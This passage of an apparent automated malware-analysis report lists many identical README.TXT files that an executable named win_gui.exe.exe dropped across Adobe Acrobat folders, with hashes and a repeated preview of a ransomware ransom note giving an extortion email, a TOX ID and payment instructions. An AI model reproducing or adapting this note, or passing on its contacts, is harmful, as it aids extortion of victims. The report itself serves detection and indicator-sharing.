                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\pt-br\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ro-ro\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\root\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\ru-ru\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\sk-sk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\sl-si\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\sl-sl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\sv-se\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\tr-tr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\uk-ua\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\zh-cn\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\oauthdialog\js\nls\zh-tw\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
